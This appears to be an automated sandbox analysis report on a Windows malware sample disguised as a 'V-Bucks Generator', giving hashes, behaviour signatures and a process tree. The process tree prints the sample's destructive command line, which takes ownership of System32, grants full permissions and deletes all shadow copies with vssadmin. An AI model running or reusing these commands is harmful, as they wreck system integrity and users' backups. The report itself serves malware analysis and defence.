Analysis
-
max time kernel
15s -
max time network
16s -
platform
windows7_x64 -
resource
win7-20240704-en -
resource tags
arch:x64arch:x86image:win7-20240704-enlocale:en-usos:windows7-x64system -
submitted
14-08-2024 12:09
Static task
static1
Behavioral task
behavioral1
Sample
V-Bucks Generator.exe
Resource
win7-20240704-en
Behavioral task
behavioral2
Sample
V-Bucks Generator.exe
Resource
win10v2004-20240802-en
General
-
Target
V-Bucks Generator.exe
-
Size
458KB
-
MD5
d5e63bc0a087c9cda1215688405b6fb2
-
SHA1
e32d08d66878bf50458cd8674dfc581a6fc611d4
-
SHA256
9bf2689546105532a778dc6a0a6e964ece8ff33c4fcea28e82c29940e06d2666
-
SHA512
cdc9610af7562bca20bb29a14b7acb0facef90f15b21ad4d0006e5dc2afc9533cd406c7735dcc9c1e353cc04ff4b480d7d0229be59e2b0e51ed91bbef4298f12
-
SSDEEP
12288:QGchrYmYRz1T/I/x/c/Qkrn5gA6IG+rQFR:SrqJT/Cw5gA6Iy
Malware Config
Signatures
-
Deletes shadow copies 3 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Possible privilege escalation attempt 4 IoCs
Processes:
icacls.exetakeown.exeicacls.exetakeown.exepid process 2800 icacls.exe 2852 takeown.exe 2820 icacls.exe 2844 takeown.exe -
Modifies file permissions 1 TTPs 4 IoCs
Processes:
takeown.exeicacls.exetakeown.exeicacls.exepid process 2844 takeown.exe 2800 icacls.exe 2852 takeown.exe 2820 icacls.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Interacts with shadow copies 3 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
Processes:
vssadmin.exepid process 2672 vssadmin.exe -
Suspicious use of AdjustPrivilegeToken 5 IoCs
Processes:
takeown.exetakeown.exevssvc.exedescription pid process Token: SeTakeOwnershipPrivilege 2844 takeown.exe Token: SeTakeOwnershipPrivilege 2852 takeown.exe Token: SeBackupPrivilege 2656 vssvc.exe Token: SeRestorePrivilege 2656 vssvc.exe Token: SeAuditPrivilege 2656 vssvc.exe -
Suspicious use of WriteProcessMemory 18 IoCs
Processes:
V-Bucks Generator.execmd.exedescription pid process target process PID 2972 wrote to memory of 2684 2972 V-Bucks Generator.exe cmd.exe PID 2972 wrote to memory of 2684 2972 V-Bucks Generator.exe cmd.exe PID 2972 wrote to memory of 2684 2972 V-Bucks Generator.exe cmd.exe PID 2684 wrote to memory of 2844 2684 cmd.exe takeown.exe PID 2684 wrote to memory of 2844 2684 cmd.exe takeown.exe PID 2684 wrote to memory of 2844 2684 cmd.exe takeown.exe PID 2684 wrote to memory of 2800 2684 cmd.exe icacls.exe PID 2684 wrote to memory of 2800 2684 cmd.exe icacls.exe PID 2684 wrote to memory of 2800 2684 cmd.exe icacls.exe PID 2684 wrote to memory of 2852 2684 cmd.exe takeown.exe PID 2684 wrote to memory of 2852 2684 cmd.exe takeown.exe PID 2684 wrote to memory of 2852 2684 cmd.exe takeown.exe PID 2684 wrote to memory of 2820 2684 cmd.exe icacls.exe PID 2684 wrote to memory of 2820 2684 cmd.exe icacls.exe PID 2684 wrote to memory of 2820 2684 cmd.exe icacls.exe PID 2684 wrote to memory of 2672 2684 cmd.exe vssadmin.exe PID 2684 wrote to memory of 2672 2684 cmd.exe vssadmin.exe PID 2684 wrote to memory of 2672 2684 cmd.exe vssadmin.exe -
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\V-Bucks Generator.exe"C:\Users\Admin\AppData\Local\Temp\V-Bucks Generator.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:2972 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c color 47 && title Critical process && takeown /f C:\Windows\System32 && icacls C:\Windows\System32 /grant %username%:F && takeown /f C:\Windows\System32\drivers && icacls C:\Windows\System32\drivers /grant %username%:F && vssadmin delete shadows /all /quiet && Exit2⤵
- Suspicious use of WriteProcessMemory
PID:2684 -
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System323⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:2844
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32 /grant Admin:F3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2800
-
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers3⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:2852
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers /grant Admin:F3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2820
-
-
C:\Windows\system32\vssadmin.exevssadmin delete shadows /all /quiet3⤵
- Interacts with shadow copies
PID:2672
-
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2656